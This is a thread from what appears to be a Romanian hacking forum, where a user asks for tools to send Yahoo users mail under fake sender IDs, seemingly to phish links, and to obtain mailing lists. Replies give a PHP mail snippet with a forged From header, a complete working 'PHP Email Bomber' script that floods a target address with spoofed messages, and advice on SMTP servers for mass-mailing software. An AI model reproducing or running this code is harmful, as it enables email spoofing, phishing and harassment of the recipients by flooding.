ROWAREZ 
			rowarez hacking forum
		 | 
		
			Lista Forumurilor Pe Tematici
		 | 
	
	
		
			ROWAREZ | Reguli | Inregistrare | Login
   POZE ROWAREZ
  
			Nu sunteti logat.
		 | 
	
	Nou pe simpatie: Andreea_K pe Simpatie
   | Femeie 25 ani Caras Severin cauta Barbat 30 - 49 ani |   
	 | 
	
	
		
			
				
					| 
						 
							Y2K` 
							Junior Member
  
							Inregistrat: acum 13 ani 
							Postari: 51
						 
					 | 
				 
			 
		 | 
		
			
				
					
						exista ceva program cu care sa trimitzi mailuri la user`i de la yahoo.com cu id false cum ar fii cool_ma_man_ya_ya_ya cu anumite mesaje ...... care ar putea sa imi dea un link cu el ? (si de unde sa fac rost de o lista cu mailuri pt program > ?  
  
					 | 
				 
			 
		 | 
	
	
		| pus acum 13 ani | 
		
			
		 | 
	
	
		
			
				
					
						
							big chuck
							Junior Member
							  Inregistrat: acum 13 ani 
							Postari: 56
						  
					 | 
				 
			 
		 | 
		
			
				
					
						aveau aia de la elite-c0derz un script intr-o pagina ca sa trim. fake emailz..
  ex:
  D3 l@ : b_1_g_c_h_ck1_@_f_u_t_a_c_i_o_s_._r_o_ Pentru: y2k'@yahoo.com.smecheras Subiect: test Mesaj: djwqnbdwqj
  stai sa gasesc pagina   
  _______________________________________ The answer is not in the box,the answer is in the band
  
					 | 
				 
			 
		 | 
	
	
		| pus acum 13 ani | 
		
			
		 | 
	
	
		
			
				
					| 
						 
							Y2K` 
							Junior Member
  
							Inregistrat: acum 13 ani 
							Postari: 51
						 
					 | 
				 
			 
		 | 
		
			
				
					
						ye ye mc mult :*   
  
					 | 
				 
			 
		 | 
	
	
		| pus acum 13 ani | 
		
			
		 | 
	
	
		
			
				
					| 
						 
							Y2K` 
							Junior Member
  
							Inregistrat: acum 13 ani 
							Postari: 51
						 
					 | 
				 
			 
		 | 
		
			
		 | 
	
	
		| pus acum 13 ani | 
		
			
		 | 
	
	
		
			
				
					
						
							big chuck
							Junior Member
							  Inregistrat: acum 13 ani 
							Postari: 56
						  
					 | 
				 
			 
		 | 
		
			
				
					
						nu dar iti caut maine cand vin acasa  codul sursa
  _______________________________________ The answer is not in the box,the answer is in the band
  
					 | 
				 
			 
		 | 
	
	
		| pus acum 13 ani | 
		
			
		 | 
	
	
		
			
				
					| 
						 
							Y2K` 
							Junior Member
  
							Inregistrat: acum 13 ani 
							Postari: 51
						 
					 | 
				 
			 
		 | 
		
			
				
					
						cod php pt un fel de program care face aja ceva
 
 Code:
 
 $to = " E-mail ";
$subject = "mere";
$body = "fncmgmdfgmfmgf";
$headers = "From:  E-mail n";
mail($to,$subject,$body,$headers);
echo "Mail sent to $to";
if(mail($to,$subject,$body,$headers)) {
echo "Am Trimis un email la $to cu subiectu $subject";
} else {
echo "email`u nu a fost trimis ! verifica daca $to chiar exista ";
} |  
  o sa il fac mai complex   
  
					 | 
				 
			 
		 | 
	
	
		| pus acum 13 ani | 
		
			
		 | 
	
	
		
			
				
					| 
						 
							laurxxx 
							One Hit Wonder ✯
  
							Inregistrat: acum 13 ani 
							Postari: 1
						 
					 | 
				 
			 
		 | 
		
			
				
					
						vedeti asta:
 
 Code:
 
 <?php
/*
PHP Email Bomber 
=========================
   Masters-Hackers.info 
=========================
*/
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> PHP Email Bomber </title>
<meta name="Generator" content="PHP Email Bomber" />
<meta name="Description" content="A PHP Email Bomber Script Coded In PHP" />
<meta name="Keywords" content="php, email, bomber" />
</head>
<body>
<form method="post" action="">
<b>Email To Bomb:</b>
<input type="text" name="emailto" size="53"><br />
<b>Email From:</b>
<input type="text" name="emailfrom" size="53"><br />
<b>Subject:</b>
<input type="text" name="subject" size="53"><br />
<b>Message:</b><br />
<textarea name="message" rows="6" cols="40"></textarea>
<br /><br />
<b>Send <input type="text" name="sendamount" size="1" value="1"> Email(s).</b> <input type="submit" name="bombmail" value="Bomb Email!">
</form>
<?php
if (isset($_REQUEST['bombmail'])){
$emailto = $_POST['emailto'];
$emailfrom = "From: ".$_POST['emailfrom'];
$subject = $_POST['subject'];
$message = $_POST['message'];
$sendamount = $_POST['sendamount'];
$i = 0;
if ($emailto == ""){
echo "<br /><b>Error: You must enter an email to bomb!</b>";
} else if ($emailfrom == ""){
echo "<br /><b>Error: You must enter an email to send from!</b>";
} else if ($subject == ""){
echo "<br /><b>Error: You did not enter a subject for your message!</b>";
} else if ($message == ""){
echo "<br /><b>Error: You did not enter a message to send!</b>";
} else if ($sendamount == ""){
echo "<br /><b>Error: You did not enter a valid amount of emails to send!</b>";
} else {
do {
mail($emailto, $subject, $message, $emailfrom);
$i++;
}
while ($i<$sendamount);
echo "<br /><b>You have successfully bombed ".$emailto." with ".$i." emails!</b>";
}
}
?>
</body>
</html> |  
 
 
  
					 | 
				 
			 
		 | 
	
	
		| pus acum 13 ani | 
		
			
		 | 
	
	
		
			
				
					| 
						 
							Y2K` 
							Junior Member
  
							Inregistrat: acum 13 ani 
							Postari: 51
						 
					 | 
				 
			 
		 | 
		
			
				
					
						thax :* :* :*  
  
					 | 
				 
			 
		 | 
	
	
		| pus acum 13 ani | 
		
			
		 | 
	
	
		
			
				
					| 
						 
							Y2K` 
							Junior Member
  
							Inregistrat: acum 13 ani 
							Postari: 51
						 
					 | 
				 
			 
		 | 
		
			
				
					
						o intrebare cum fac rost de un server pentru dvanced mass sender ( os win ) ? ca cica nu se poate conecta ,......  cer informatzi despre utilizare
  
					 | 
				 
			 
		 | 
	
	
		| pus acum 13 ani | 
		
			
		 | 
	
	
		
			
				
					| 
						 
							Sad_Dreamer 
							Resident Elite
  
							Inregistrat: acum 13 ani 
							Postari: 233
						 
					 | 
				 
			 
		 | 
		
			
				
					
						programul nu are un HELP?
  _______________________________________ In caz ca nu sti...Getting Laid <> Getting r00t
  
					 | 
				 
			 
		 | 
	
	
		| pus acum 13 ani | 
		
			
		 | 
	
	
		
			
				
					| 
						 
							Y2K` 
							Junior Member
  
							Inregistrat: acum 13 ani 
							Postari: 51
						 
					 | 
				 
			 
		 | 
		
			
				
					
						help?     
  
					 | 
				 
			 
		 | 
	
	
		| pus acum 13 ani | 
		
			
		 | 
	
	
		
			
				
					| 
						 
							Sad_Dreamer 
							Resident Elite
  
							Inregistrat: acum 13 ani 
							Postari: 233
						 
					 | 
				 
			 
		 | 
		
			
				
					
						
 Y2K` a scris:
  o intrebare cum fac rost de un server pentru dvanced mass sender ( os win ) ? ca cica nu se poate conecta ,......  cer informatzi despre utilizare |  
 
  iti trebuie un server smtp  fa-ti un cont la un server de mail free care are si smtp free si gata ( dar nu garantez ca ajung in inbox)
  sau uite un alt program care are si smtp incorporat
 
  _______________________________________ In caz ca nu sti...Getting Laid <> Getting r00t
  
					 | 
				 
			 
		 | 
	
	
		| pus acum 13 ani | 
		
			
		 | 
	
	
		
			
				
					| 
						 
							Y2K` 
							Junior Member
  
							Inregistrat: acum 13 ani 
							Postari: 51
						 
					 | 
				 
			 
		 | 
		
			
				
					
						ok thanx      
  
					 | 
				 
			 
		 | 
	
	
		| pus acum 13 ani | 
		
			
		 |